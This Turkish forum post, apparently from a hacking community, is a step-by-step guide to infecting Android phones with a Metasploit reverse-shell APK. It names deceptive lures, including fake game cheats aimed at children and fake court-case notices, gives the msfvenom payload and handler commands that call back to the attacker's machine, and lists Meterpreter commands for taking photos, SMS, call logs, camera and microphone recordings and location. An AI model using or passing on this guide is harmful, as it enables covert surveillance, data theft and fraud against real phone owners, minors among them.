CÜMLETEN SELAMIN ALEYKÜM
Android Cihazlara Metasploit ile Sızma
1. Sosyal Mühendislik (En Önemli Kısım)
APK’yı kurdurmak için insan kandırma yöntemleri:
- Ücretsiz PUBG / Free Fire ucuz elmas veya skin gibi
- “Banka / PTT / Kargo güncellemesi” diye fake mesaj atın
Ben Genellikle : hakkınızda dava dosyası var diyerek yapıyorum daha inandırıcı oluyor
APK ismini : Genellikle veletler elmas hilesi can hilesi gibi şeyleri sever bu yüzden bu tip şeyleri yazmak daha mantıklı
2. APK Üretme (msfvenom ile)
Kali Linux’ta terminal aç ve şu komutu yaz:
msfvenom -p android/meterpreter/reverse_tcp LHOST=senin_ip_adresin LPORT=4444 -o gizli.apk
Açıklama:
- android/meterpreter/reverse_tcp → Android için en çok kullanılan payload (Meterpreter)
- LHOST= → Senin bilgisayarının IP’si (kali’de ifconfig veya ip a yazıp öğren)
- LPORT=4444 → Dinleme portu (istediğini yazabilirsin)
- -o gizli.apk → Çıkan dosyanın adı
- APK adını dediğim gibi oyun hilesi yada daha resmi şeyler için kullanacaksanız dava dosyası gibi koyabilirsiniz orası size kalmış
Daha az antivirüs yakalasın diye (2026’da hâlâ biraz işe yarıyor):
msfvenom -p android/meterpreter/reverse_tcp LHOST=senin_ip LPORT=4444 -o gizli.apk
3. Dinleyiciyi Açma (msfconsole)
Yeni bir terminal aç ve şu komutları sırayla yaz:
msfconsole
İçine girdikten sonra:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST senin_ip_adresin
set LPORT 4444
exploit
Şimdi bekle. Kurban APK’yı kurup açtığında burada Meterpreter session açılacak.
4. Sızdıktan Sonra Yapabileceğin Temel Komutlar (Meterpreter)
Session açıldığında şu komutları kullanabilirsin:
| Komut | Ne İşe Yarar | Açıklama |
|---|---|---|
| help | Tüm komutları gösterir | İlk yapman gereken |
| sysinfo | Telefonun model, android versiyonu vs. | Cihaz bilgisi |
| getuid | Kim olarak bağlı olduğunu gösterir | Genelde u0_aXX çıkar |
| shell | Normal terminal (bash gibi) açar | exit ile geri dön |
| pwd | Şu anki klasörü gösterir | - |
| ls | Dosyaları listeler | - |
| cd /sdcard/DCIM/Camera | Fotoğrafların olduğu yere gider | En çok kullanılan |
| download resim.jpg | Telefondaki dosyayı bilgisayarına indirir | - |
| upload virus.exe /sdcard/ | Bilgisayardaki dosyayı telefona yükler | - |
| screenshot | Telefon ekranının fotoğrafını çeker | Çok işe yarar |
| webcam_snap | Ön veya arka kameradan fotoğraf çeker | - |
| webcam_stream | Canlı kamera yayını yapar | - |
| record_mic 10 | 10 saniye ses kaydı yapar | - |
| dump_calllog | Arama kayıtlarını alır | - |
| dump_sms | SMS mesajlarını alır | - |
| geolocate | Yaklaşık konum alır | - |
| hide_app_icon | APK simgesini gizler (2026’da çalışan versiyonlarda) | Görünmez olur |
Temel Akış Örneği:
- sysinfo → cihaz bilgisi al
- cd /sdcard/DCIM/Camera
- ls → fotoğraflara bak
- download *.jpg → hepsini indir (dikkatli kullan)
- screenshot → anlık ekran al
uyarı ! :
APK’yı kurarken telefon Bilinmeyen Kaynaklar izni ister → kurbanı ikna etmen lazım.
Android 10 ve üstünde çok daha zor kurduruluyor (Play Protect vs.).
SAYGILAR....
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
